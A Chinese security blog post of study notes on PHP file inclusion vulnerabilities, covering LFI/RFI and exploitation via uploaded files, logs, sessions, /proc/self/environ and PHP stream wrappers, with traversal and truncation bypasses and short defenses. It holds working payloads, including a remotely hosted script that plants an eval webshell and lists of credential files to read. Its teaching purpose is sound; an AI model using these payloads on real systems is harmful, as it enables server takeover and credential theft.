<!DOCTYPE html>
<html lang="zh-CN">





<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/apple-touch-icon.png">
  <link rel="icon" type="image/png" href="/img/image3.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="description" content="zs0zrc&#39;s blog">
  <meta name="author" content="zs0zrc">
  <meta name="keywords" content="pwn CTF security anythings">
  <title>文件包含漏洞 - zs0zrc</title>

  <link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/5.12.1/css/all.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/css/bootstrap.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/mdbootstrap/4.13.0/css/mdb.min.css">
<link rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/3.0.1/github-markdown.min.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_1067060_qzomjdt8bmp.css">


  <link rel="stylesheet" href="/lib/prettify/tomorrow-night-eighties.min.css">

<link rel="stylesheet" href="/css/main.css">


  <link rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css">


<!-- 自定义样式保持在最底部 -->


</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">&nbsp;<strong>zs0zrc</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/">首页</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/archives/">归档</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/categories/">分类</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/tags/">标签</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/about/">关于</a>
          </li>
        
          
          
          
          
          <li class="nav-item">
            <a class="nav-link" href="/links/">友链</a>
          </li>
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;&nbsp;<i class="iconfont icon-search"></i>&nbsp;&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="view intro-2" id="background" parallax=true
         style="background: url('/img/image1.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask rgba-black-light flex-center">
          <div class="container text-center white-text fadeInUp">
            <span class="h2" id="subtitle">
              
            </span>

            
              
                <p class="mt-3 post-meta">
                  <i class="fas fa-calendar-alt" aria-hidden="true"></i>
                  星期二, 四月 28日 2020, 6:34 晚上
                </p>
              

              <p class="mt-1">
                
                  
                  <span class="post-meta">
                    <i class="far fa-chart-bar"></i>
                    2.7k 字
                  </span>
                

                
                  
                  <span class="post-meta">
                      <i class="far fa-clock"></i>
                      11 分钟
                  </span>
                

                
                  <!-- 不蒜子统计文章PV -->
                  
                  <span id="busuanzi_container_page_pv" class="post-meta" style="display: none">
                    <i class="far fa-eye" aria-hidden="true"></i>
                    <span id="busuanzi_value_page_pv"></span> 次
                  </span>
                
              </p>
            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5 z-depth-3" id="board">
          <div class="post-content mx-auto" id="post">
            
              <p class="note note-warning">本文最后更新于：星期三, 四月 29日 2020, 11:27 上午</p>
            
            <div class="markdown-body">
              <h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><p>文件包含漏洞学习笔记</p>
<h3 id="基本概念"><a href="#基本概念" class="headerlink" title="基本概念"></a>基本概念</h3><p>程序开发人员为了让代码更灵活，将被包含的文件设置为变量，然后通过文件包含函数去引入文件，这就是文件包含。</p>
<p>PHP中用于文件包含的函数用四个:</p>
<ul>
<li>require()</li>
<li>require_once()</li>
<li>include()</li>
<li>include_once()</li>
</ul>
<p>include和require函数的区别是：include()在包含过程中如果出现错误，会抛出一个警告，程序继续执行，而require()出现错误时，会直接报错并退出程序。</p>
<p>require_once()和include_once()功能与require()和include()相同，但是如果一个文件被包含过了，那么require_once()和include_once()就不会再包含它，避免了函数重定义或变量重定义等问题。</p>
<p>当使用上面四个函数包含一个新文件时，会将这个文件内容当作PHP代码执行，PHP的内核不会关心被包含文件的类型。</p>
<h3 id="漏洞形成原因"><a href="#漏洞形成原因" class="headerlink" title="漏洞形成原因"></a>漏洞形成原因</h3><p>在通过PHP函数引入文件时，传入的文件名没有经过合理的验证，从而导致用户可以操作预料外的文件，就可能导致文件泄露甚至恶意代码注入。</p>
<p>一个简单的demo:</p>
<pre><code class="php">&lt;?php
    $file = $_GET[&#39;file&#39;];
    @include(&quot;$file&quot;);
?&gt;
</code></pre>
<p><img src="/picture/image-20200428191551362.png" srcset="/img/loading.gif" alt="image-20200428191551362"></p>
<h3 id="漏洞分类"><a href="#漏洞分类" class="headerlink" title="漏洞分类"></a>漏洞分类</h3><ul>
<li><p>本地文件包含LFI（Local File Inclusion）</p>
<p>也就是能打开并包含本地文件，一般遇到的文件包含漏洞都是本地文件包含漏洞。</p>
</li>
<li><p>远程文件包含RFI（Remote File Inclusion）</p>
<p>这个允许我们包含远程服务的文件并执行，需要对php.ini进行配置：</p>
<ol>
<li>allow_url_fopen = On （默认为On）</li>
<li>allow_url_include = On （php5.2之后默认为Off）</li>
</ol>
<p>只有两个配置项都为On时才能利用</p>
</li>
</ul>
<h3 id="文件包含利用"><a href="#文件包含利用" class="headerlink" title="文件包含利用"></a>文件包含利用</h3><h4 id="包含上传文件"><a href="#包含上传文件" class="headerlink" title="包含上传文件"></a>包含上传文件</h4><p>文件包含函数会将被包含文件内容当作php代码去解析，可以通过网站的上传功能去上传一个图片马，然后通过文件包含去执行上传的webshell</p>
<h4 id="读取敏感文件信息"><a href="#读取敏感文件信息" class="headerlink" title="读取敏感文件信息"></a>读取敏感文件信息</h4><p>linux:</p>
<blockquote>
<p>/etc/passwd</p>
<p>/etc/group</p>
<p>/etc/shadow</p>
<p>/usr/local/app/apache2/conf/httpd.conf    // Apache2默认配置文件</p>
<p>/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置</p>
<p>/usr/local/app/php5/lib/php.ini //PHP相关配置</p>
<p>/etc/httpd/conf/httpd.conf // Apache配置文件</p>
<p>/etc/my.conf // mysql 配置文件</p>
</blockquote>
<p> windows</p>
<blockquote>
<p>c:\boot.ini // 查看系统版本</p>
<p>c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件</p>
<p>c:\windows\repair\sam // 存储Windows系统初次安装的密码</p>
<p>c:\ProgramFiles[mysql](<a href="https://cloud.tencent.com/product/cdb?from=10680)\my.ini" target="_blank" rel="noopener">https://cloud.tencent.com/product/cdb?from=10680)\my.ini</a> // MySQL配置</p>
<p>c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码</p>
<p>c:\windows\php.ini // php 配置信息</p>
</blockquote>
<p>可以参考这篇博客：<a href="https://www.cnblogs.com/v1vvwv/p/Sensitive-Information-Leakge.html" target="_blank" rel="noopener">https://www.cnblogs.com/v1vvwv/p/Sensitive-Information-Leakge.html</a></p>
<h4 id="远程文件包含getshell"><a href="#远程文件包含getshell" class="headerlink" title="远程文件包含getshell"></a>远程文件包含getshell</h4><p>在远程服务器创建shell.txt文件</p>
<pre><code class="php">&lt;?php fputs(fopen(&quot;../shell.php&quot;,&quot;w&quot;),&#39;&lt;?php eval($_POST[cmd]);?&gt;&#39;);?&gt;
</code></pre>
<p>如果web应用存在远程文件包含漏洞，通过下面的url进行访问</p>
<blockquote>
<p><a href="http://www.demo1.com/index.php?file=http://www.demo2.com/shell.txt" target="_blank" rel="noopener">http://www.demo1.com/index.php?file=http://www.demo2.com/shell.txt</a></p>
</blockquote>
<p>那么就会在服务器目录下生成一个webshell，然后可以用webshell去操作了</p>
<p><img src="/picture/image-20200428195605215.png" srcset="/img/loading.gif" alt="image-20200428195605215"></p>
<h4 id="包含environ文件"><a href="#包含environ文件" class="headerlink" title="包含environ文件"></a>包含environ文件</h4><p>原理：<a href="https://www.exploit-db.com/papers/12886" target="_blank" rel="noopener">https://www.exploit-db.com/papers/12886</a></p>
<p>/proc/self/environ文件中有web进程运行时的环境变量，其中很多是用户能控制得，一般来说通过在User-Agent中注入php代码，然后包含/proc/self/environ来getshell。</p>
<p>/proc/self/environ文件一般通过目录遍历去访问，如下：</p>
<blockquote>
<p>../../../../../../../../proc/self/environ</p>
</blockquote>
<p>利用条件：</p>
<ul>
<li>php以cgi方式运行，这样environ才会保持UA头</li>
<li>environ文件可读</li>
</ul>
<h4 id="包含日志文件"><a href="#包含日志文件" class="headerlink" title="包含日志文件"></a>包含日志文件</h4><p>web服务器一般会将用户的访问记录保存在访问日志中，可以通过构造请求，将PHP代码插入日志文件中，然后通过文件包含漏洞来执行日志中的PHP代码</p>
<p>利用条件：</p>
<ul>
<li>日志文件可读</li>
<li>知道日志文件存储目录</li>
</ul>
<p>常包含的文件目录：</p>
<pre><code>/var/log/apache/access.log
/var/log/apache/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
</code></pre><p>一般情况下日志存储目录会被修改，需要读取服务器配置文件(httpd.conf / nginx.conf …..)或者根据phpinfo()的信息得到日志文件存储目录。同时日志记录的信息格式可能会被调整。</p>
<p>通常直接发起请求时不行的，会导致一些符号被编码无法正确解析，所以用bp抓包修改后发送请求。</p>
<p><strong>包含SSH log</strong></p>
<p>ssh-log默认存储路径为：/var/log/auth.log</p>
<p>poc:</p>
<blockquote>
<p>ssh “&lt;?php system(ls);?&gt;”@192.168.45.140</p>
</blockquote>
<p><img src="/picture/image-20200429100500251.png" srcset="/img/loading.gif" alt="image-20200429100500251"></p>
<h4 id="包含Session文件"><a href="#包含Session文件" class="headerlink" title="包含Session文件"></a>包含Session文件</h4><p>利用条件：</p>
<ul>
<li>存在Session内的可控变量</li>
<li>Session文件可读写，并且知道存储路径</li>
</ul>
<p>demo:</p>
<pre><code class="php">&lt;?php
    session_start();
    $username = $_GET[&#39;username&#39;];
    $_SESSION[&#39;username&#39;] = $username;
</code></pre>
<p>Session一般默认存储路径：</p>
<blockquote>
<p>/tmp</p>
<p>/tmp/sessions</p>
<p>/var/lib/php5</p>
<p>/var/lib/php7</p>
</blockquote>
<p>Session文件命名格式：sess_[phpsessid]   其中phpsessid可以在cookie中找到，所以一般知道Session的存储路径就可以知道Session的完整路径了。</p>
<p>Session的存储目录在phpinfo()的信息中也有，有session.save_path控制。</p>
<p>往Session中写入PHP代码</p>
<p><img src="/picture/image-20200428205054989.png" srcset="/img/loading.gif" alt="image-20200428205054989"></p>
<p>确认Session文件名：sess_d296d6332474ac7bd3cff71728b6f646</p>
<p><img src="/picture/image-20200428205110726.png" srcset="/img/loading.gif" alt="image-20200428205110726"></p>
<p>  <img src="/picture/image-20200428205211368.png" srcset="/img/loading.gif" alt="image-20200428205211368"></p>
<p>通过文件包含Session执行PHP代码</p>
<p><img src="/picture/image-20200428205336540.png" srcset="/img/loading.gif" alt="image-20200428205336540"></p>
<h4 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h4><p>PHP提供了一些杂项输入/输出（IO）流，允许访问PHP的输入输出流、标准输入输出和错误描述符，内存中、磁盘备份的临时文件流以及可操作的其他读取写入文件资源的过滤器。</p>
<p>一共有12个协议：</p>
<ul>
<li><a href="https://www.php.net/manual/zh/wrappers.file.php" target="_blank" rel="noopener">file://</a> — 访问本地文件系统</li>
<li><a href="https://www.php.net/manual/zh/wrappers.http.php" target="_blank" rel="noopener">http://</a> — 访问 HTTP(s) 网址</li>
<li><a href="https://www.php.net/manual/zh/wrappers.ftp.php" target="_blank" rel="noopener">ftp://</a> — 访问 FTP(s) URLs</li>
<li><a href="https://www.php.net/manual/zh/wrappers.php.php" target="_blank" rel="noopener">php://</a> — 访问各个输入/输出流（I/O streams）</li>
<li><a href="https://www.php.net/manual/zh/wrappers.compression.php" target="_blank" rel="noopener">zlib://</a> — 压缩流</li>
<li><a href="https://www.php.net/manual/zh/wrappers.data.php" target="_blank" rel="noopener">data://</a> — 数据（RFC 2397）</li>
<li><a href="https://www.php.net/manual/zh/wrappers.glob.php" target="_blank" rel="noopener">glob://</a> — 查找匹配的文件路径模式</li>
<li><a href="https://www.php.net/manual/zh/wrappers.phar.php" target="_blank" rel="noopener">phar://</a> — PHP 归档</li>
<li><a href="https://www.php.net/manual/zh/wrappers.ssh2.php" target="_blank" rel="noopener">ssh2://</a> — Secure Shell 2</li>
<li><a href="https://www.php.net/manual/zh/wrappers.rar.php" target="_blank" rel="noopener">rar://</a> — RAR</li>
<li><a href="https://www.php.net/manual/zh/wrappers.audio.php" target="_blank" rel="noopener">ogg://</a> — 音频流</li>
<li><a href="https://www.php.net/manual/zh/wrappers.expect.php" target="_blank" rel="noopener">expect://</a> — 处理交互式的流</li>
</ul>
<h5 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h5><p>php://input可以获取POST请求的原始数据的只读流。当它和包含函数结合时，php://input流会被当作php文件执行，从而导致任意代码执行。要注意的是在 <em>enctype=”multipart/form-data”</em> 的时候    php://input 是无效的 。</p>
<h5 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h5><p>php://filter是一种元封装器，设计用于数据流打开时的筛选过滤应用。</p>
<p>它使用以下的参数作为路径的一部分</p>
<table>
<thead>
<tr>
<th>名称</th>
<th>描述</th>
</tr>
</thead>
<tbody>
<tr>
<td><em>resource=&lt;要过滤的数据流&gt;</em></td>
<td>这个参数是必须的。它指定了你要筛选过滤的数据流。</td>
</tr>
<tr>
<td><em>read=&lt;读链的筛选列表&gt;</em></td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符（*\</td>
<td>*）分隔。</td>
</tr>
<tr>
<td><em>write=&lt;写链的筛选列表&gt;</em></td>
<td>该参数可选。可以设定一个或多个过滤器名称，以管道符（*\</td>
<td>*）分隔。</td>
</tr>
<tr>
<td><em>&lt;；两个链的筛选列表&gt;</em></td>
<td>任何没有以 <em>read=</em> 或 <em>write=</em> 作前缀 的筛选器列表会视情况应用于读或写链。</td>
</tr>
</tbody>
</table>
<p>php://filter可以获取指定文件源码，但是但它和包含函数结合时，php://filter流会被当作php文件执行，所以一般会对它进行编码，让它不执行，来实现任意文件读取。</p>
<p>poc:</p>
<blockquote>
<p>?file=php://filter/read=convert.base64.encode/resource=phpinfo.php</p>
</blockquote>
<p>利用条件:</p>
<ul>
<li>allow_url_fopen = On/Off</li>
<li>allow_url_include = On/Off</li>
</ul>
<p>常用的过滤器有两个：convert.<em> 和 string.</em></p>
<ul>
<li><p>convert.*</p>
<p> convert.* 过滤器的作用就和其名字一样。转换过滤器是 PHP 5.0.0 添加的.</p>
<p> <em>convert.base64-encode</em>和     <em>convert.base64-decode</em>使用这两个过滤器等同于分别用     <a href="https://www.php.net/manual/zh/function.base64-encode.php" target="_blank" rel="noopener">base64_encode()</a>和     <a href="https://www.php.net/manual/zh/function.base64-decode.php" target="_blank" rel="noopener">base64_decode()</a>函数处理所有的流数据。 </p>
</li>
<li><p>string.*</p>
<p>这个过滤器的作用是对字符进行各种转换，如加密、转换大小写等。</p>
<p> <em>string.rot13</em>（自 PHP 4.3.0 起）使用此过滤器等同于用     <a href="https://www.php.net/manual/zh/function.str-rot13.php" target="_blank" rel="noopener">str_rot13()</a>函数处理所有的流数据 。</p>
<p> <em>string.toupper</em>（自 PHP 5.0.0 起）使用此过滤器等同于用     <a href="https://www.php.net/manual/zh/function.strtoupper.php" target="_blank" rel="noopener">strtoupper()</a>函数处理所有的流数据 。</p>
<p> <em>string.tolower</em>（自 PHP 5.0.0 起）使用此过滤器等同于用     <a href="https://www.php.net/manual/zh/function.strtolower.php" target="_blank" rel="noopener">strtolower()</a>函数处理所有的流数据。 </p>
</li>
</ul>
<h5 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h5><p>zip://可以访问压缩包里面的文件。当它和包含函数结合时，zip://流会被当作 php文件执行。它不在乎压缩包的后缀名，只要文件是zip的压缩包就行了。相同类型的协议还有zlib://和 bzip2://</p>
<p>poc:</p>
<blockquote>
<p>zip://[压缩包绝对路径]#[压缩包内文件]</p>
<p>?file=zip:///var/www/html/myzip.zip%23phpinfo.txt</p>
</blockquote>
<p>利用条件：</p>
<ul>
<li>allow_url_fopen = On/Off</li>
<li>allow_url_include = On/Off</li>
<li>php &gt;= 5.2</li>
</ul>
<h5 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h5><p>phar://类似与zip://，一样可以导致任意代码执行，但是phar://中可以使用相对路径。</p>
<p>poc:</p>
<blockquote>
<p>?file=phar://myzip.zip/phpinfo.txt</p>
<p>?file=phar:///var/www/html/myzip.zip/phpinfo.txt</p>
</blockquote>
<p>利用条件：</p>
<ul>
<li>allow_url_fopen = On/Off</li>
<li>allow_url_include = On/Off</li>
<li>php &gt;= 5.3</li>
</ul>
<h5 id="data"><a href="#data" class="headerlink" title="data://"></a>data://</h5><p>data://协议类似与php://input，可以让用户控制输入流，当它与包含函数结合时，用户输入的data://会被当作php文件执行。</p>
<p>poc:</p>
<blockquote>
<p><code>data://[&lt;MIME-type&gt;][;charset=&lt;encoding&gt;][;base64],&lt;data&gt;</code></p>
<p>?file=data://,&lt;?php phpinfo();</p>
<p>?file=data://text/plain,&lt;?php phpinfo();</p>
<p>?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==</p>
<p>?file=data:text/plain,&lt;?php phpinfo();</p>
<p>?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOw==</p>
</blockquote>
<p>利用条件：</p>
<ul>
<li>allow_url_fopen = On</li>
<li>allow_url_include = On</li>
<li>php &gt; 5.2</li>
</ul>
<p>最后来小结图：</p>
<p><img src="/picture/image-20200429105712135.png" srcset="/img/loading.gif" alt="image-20200429105712135"></p>
<h4 id="绕过姿势"><a href="#绕过姿势" class="headerlink" title="绕过姿势"></a>绕过姿势</h4><h5 id="前缀绕过"><a href="#前缀绕过" class="headerlink" title="前缀绕过"></a>前缀绕过</h5><p><strong>目录遍历</strong></p>
<p>通过使用<code>../../</code>返回上一目录，这一操作被称为目录遍历（Path Traversal）。例如：?file=../../phpinfo/phpinfo.php</p>
<p>demo:</p>
<pre><code class="php">&lt;?php
    $file = $_GET[&#39;file&#39;];
    include &quot;/var/www/html/&quot;.$file;
?&gt;
</code></pre>
<p>当./\被过滤了怎么办，可以使用不同的编码来绕过服务器的waf防御</p>
<pre><code>2e%2e%2f    -&gt;    ../
%2e%2e/     -&gt;    ../
..%2f     -&gt;    ../
%2e%2e%5c    -&gt;    ..\
%2e%2e%\    -&gt;    ..\
..%5c     -&gt;    ..\
%252e%252e%255c    -&gt;    ..\
..%255c     -&gt;    ..\
</code></pre><h5 id="后缀绕过"><a href="#后缀绕过" class="headerlink" title="后缀绕过"></a>后缀绕过</h5><p>url格式：protocol://hostname[:port]/path[?query]#fragment</p>
<p><strong>利用[?query]绕过</strong></p>
<blockquote>
<p>访问参数：?file=<a href="http://localhost:80/phpinfo.php" target="_blank" rel="noopener">http://localhost:80/phpinfo.php</a>?</p>
<p>拼接后：    ?file=<a href="http://localhost:80/phpinfo.php?.txt" target="_blank" rel="noopener">http://localhost:80/phpinfo.php?.txt</a></p>
</blockquote>
<p><strong>利用#fragment绕过</strong></p>
<blockquote>
<p>访问参数：?file=<a href="http://localhost:80/phpinfo.php%23" target="_blank" rel="noopener">http://localhost:80/phpinfo.php%23</a></p>
<p>拼接后：    ?file=<a href="http://localhost:80/phpinfo.php#.txt" target="_blank" rel="noopener">http://localhost:80/phpinfo.php#.txt</a></p>
</blockquote>
<h5 id="00字符截断"><a href="#00字符截断" class="headerlink" title="00字符截断"></a>00字符截断</h5><p>这个一般遇见的比较少，因为要求php版本&lt;=5.3.4</p>
<p>poc：</p>
<blockquote>
<p>?file=phpinfo.php%00</p>
</blockquote>
<h5 id="超长字符截断"><a href="#超长字符截断" class="headerlink" title="超长字符截断"></a>超长字符截断</h5><p>linux下，目录字符串长度最大值为4096，windows的为256， 只要不断重复./ ， 则后缀在打到最大值时会被丢弃</p>
<p>poc：</p>
<blockquote>
<p>?file=./././././……././shell.php</p>
</blockquote>
<p>这个要求php版本&lt; 5.28</p>
<h5 id="利用协议"><a href="#利用协议" class="headerlink" title="利用协议"></a>利用协议</h5><p>利用zip://和phar://协议，因为整个压缩包都是我们可控的，所以只要知道他们的后缀名，就可以自己构造</p>
<p>demo:</p>
<pre><code class="php">&lt;?php
    $file = $_GET[&quot;file&quot;];
    include $file.&quot;.txt&quot;;

?&gt;
</code></pre>
<p><strong>zip://</strong></p>
<blockquote>
<p>访问参数 ?file=zip:///var/www/html/zip.jpg%23phpinfo</p>
<p>拼接后     ?file=zip:///var/www/html/zip.jpg#phpinfo.txt</p>
</blockquote>
<p><strong>phar://</strong></p>
<blockquote>
<p>访问参数  ?file=phar://zip.zip/phpinfo</p>
<p>拼接后      ?file=phar://zip.zip/phpinfo.txt</p>
</blockquote>
<h4 id="防御手段"><a href="#防御手段" class="headerlink" title="防御手段"></a>防御手段</h4><ul>
<li>allow_url_include和allow_url_fopen权限最小化</li>
<li>设置open_basedir（这个会将php能打开的文件限制在指定的目录树中）</li>
<li>白名单限制包含文件</li>
<li>严格过滤./\</li>
</ul>
<h4 id="REFERENCE"><a href="#REFERENCE" class="headerlink" title="REFERENCE"></a>REFERENCE</h4><ul>
<li><p><a href="https://www.anquanke.com/post/id/177491#h2-16" target="_blank" rel="noopener">https://www.anquanke.com/post/id/177491#h2-16</a></p>
</li>
<li><p><a href="https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/" target="_blank" rel="noopener">https://chybeta.github.io/2017/10/08/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/</a></p>
</li>
<li><p><a href="https://ca0y1h.top/Web_security/basic_learning/13.%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#%E9%98%B2%E5%BE%A1%E6%96%B9%E5%BC%8F" target="_blank" rel="noopener">https://ca0y1h.top/Web_security/basic_learning/13.%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/#%E9%98%B2%E5%BE%A1%E6%96%B9%E5%BC%8F</a></p>
</li>
<li><p><a href="https://zhuanlan.zhihu.com/p/49206578" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/49206578</a></p>
</li>
</ul>

            </div>
            <hr>
            <div>
              <p>
                
                  <span>
                <i class="iconfont icon-inbox"></i>
                    
                      <a class="hover-with-bg" href="/categories/WEB/">WEB</a>
                      &nbsp;
                    
                  </span>&nbsp;&nbsp;
                
                
              </p>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a href="https://zh.wikipedia.org/wiki/Wikipedia:CC_BY-SA_3.0%E5%8D%8F%E8%AE%AE%E6%96%87%E6%9C%AC" rel="nofollow noopener">CC BY-SA 3.0协议</a> 。转载请注明出处！</p>
              
            </div>

            
              <!-- Comments -->
              <div class="comments" id="comments">
                
                
  <script defer src="https://utteranc.es/client.js" repo="zszcr/comment" issue-term="pathname" label="utterances" theme="github-light" crossorigin="anonymous" async>
  </script>


              </div>
            
          </div>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc-start"></div>
<div id="toc">
  <p class="h5"><i class="far fa-list-alt"></i>&nbsp;目录</p>
  <div id="tocbot"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    
  </main>

  
    <a class="z-depth-1" id="scroll-top-button" href="#" role="button">
      <i class="fa fa-chevron-up scroll-top-arrow" aria-hidden="true"></i>
    </a>
  

  
    <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel" aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
  

  

  

  <footer class="mt-5">
  <div class="text-center py-3">
    <div>
      <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><b>Hexo</b></a>
      <i class="iconfont icon-love"></i>
      <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"> <b>Fluid</b></a>
    </div>
    
  <div>
    
      <!-- 不蒜子统计PV -->
      
      <span id="busuanzi_container_site_pv" style="display: none">
      总访问量 <span id="busuanzi_value_site_pv"></span> 次
    </span>
    
    
      <!-- 不蒜子统计UV -->
      
      <span id="busuanzi_container_site_uv" style="display: none">
      总访客数 <span id="busuanzi_value_site_uv"></span> 人
    </span>
    
  </div>


    

    
  </div>
</footer>

<!-- SCRIPTS -->
<script src="https://cdn.staticfile.org/jquery/3.4.1/jquery.min.js"></script>
<script src="https://cdn.staticfile.org/popper.js/1.16.1/umd/popper.min.js"></script>
<script src="https://cdn.staticfile.org/twitter-bootstrap/4.4.1/js/bootstrap.min.js"></script>
<script src="https://cdn.staticfile.org/mdbootstrap/4.13.0/js/mdb.min.js"></script>
<script src="/js/main.js"></script>


  <script src="/js/lazyload.js"></script>



  
  <script src="https://cdn.staticfile.org/tocbot/4.10.0/tocbot.min.js"></script>
  <script>
    $(document).ready(function () {
      var navHeight = $('#navbar').height();
      var post = $('#post');
      var toc = $('#toc');
      var tocLimMax = post.offset().top + post.height() - navHeight;

      $(window).scroll(function () {
        var tocLimMin = $('#toc-start').offset().top - navHeight;
        var scroH = document.body.scrollTop + document.documentElement.scrollTop;

        if (tocLimMin <= scroH && scroH <= tocLimMax) {
          toc.css({
            'display': 'block',
            'position': 'fixed',
            'top': navHeight,
          });
        } else if (scroH <= tocLimMin) {
          toc.css({
            'position': '',
            'top': '',
          });
        } else if (scroH > tocLimMax) {
          toc.css('display', 'none');
        }
      });
      tocbot.init({
        tocSelector: '#tocbot',
        contentSelector: '.post-content',
        headingSelector: 'h1,h2,h3,h4,h5,h6',
        linkClass: 'tocbot-link',
        activeLinkClass: 'tocbot-active-link',
        listClass: 'tocbot-list',
        isCollapsedClass: 'tocbot-is-collapsed',
        collapsibleClass: 'tocbot-is-collapsible',
        scrollSmooth: true,
      });
      if ($('.toc-list-item').length > 0) {
        $('#toc > p').css('visibility', 'visible');
      }
      var offset = $('#board-ctn').css('margin-right')
      $('#toc-ctn').css({
        'right': offset
      })
    });
  </script>







  <script defer src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




<!-- Plugins -->


  

  
    <!-- Google Analytics -->
    <script defer>
      (function (i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function () {
          (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o),
          m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src = g;
        m.parentNode.insertBefore(a, m)
      })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');

      ga('create', 'UA-160202176-1', 'auto');
      ga('send', 'pageview');
    </script>
  

  

  

  



  <script src="https://cdn.staticfile.org/prettify/188.0.0/prettify.min.js"></script>
  <script>
    $(document).ready(function () {
      $('pre').addClass('prettyprint  linenums');
      prettyPrint();
    })
  </script>



  <script src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js"></script>
  <script>
    var typed = new Typed('#subtitle', {
      strings: [
        '  ',
        "文件包含漏洞&nbsp;",
      ],
      cursorChar: "_",
      typeSpeed: 70,
      loop: false,
    });
    typed.stop();
    $(document).ready(function () {
      $(".typed-cursor").addClass("h2");
      typed.start();
    });
  </script>



  <script src="https://cdn.staticfile.org/anchor-js/4.2.2/anchor.min.js"></script>
  <script>
    anchors.options = {
      placement: "right",
      visible: "hover",
      
    };
    var el = "h1,h2,h3,h4,h5,h6".split(",");
    var res = [];
    for (item of el) {
      res.push(".markdown-body > " + item)
    }
    anchors.add(res.join(", "))
  </script>



  <script src="/js/local-search.js"></script>
  <script>
    var path = "/local-search.xml";
    var inputArea = document.querySelector("#local-search-input");
    inputArea.onclick = function () {
      getSearchFile(path);
      this.onclick = null
    }
  </script>



  <script src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js"></script>
  <script>
    $("#post img:not(.no-zoom img, img[no-zoom])").each(
      function () {
        var element = document.createElement("a");
